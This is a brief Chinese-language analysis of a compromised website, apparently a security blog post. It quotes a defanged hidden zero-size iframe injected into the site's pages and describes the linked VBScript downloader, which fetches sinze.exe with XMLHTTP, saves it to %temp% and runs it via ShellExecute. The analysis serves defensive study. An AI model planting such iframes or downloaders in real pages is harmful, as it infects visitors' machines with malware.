网站的网页被加入代码:
/------ <iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe> ------/
sin**ze*.htm Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。
在浏览器中打开该网页,会看到信息:
/------
就不让你看!气死你 by ******!
------/
其中******处的字符串可能是作者昵称,这里偶匿了。
还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
sinze.exe 采用 ASPack 加壳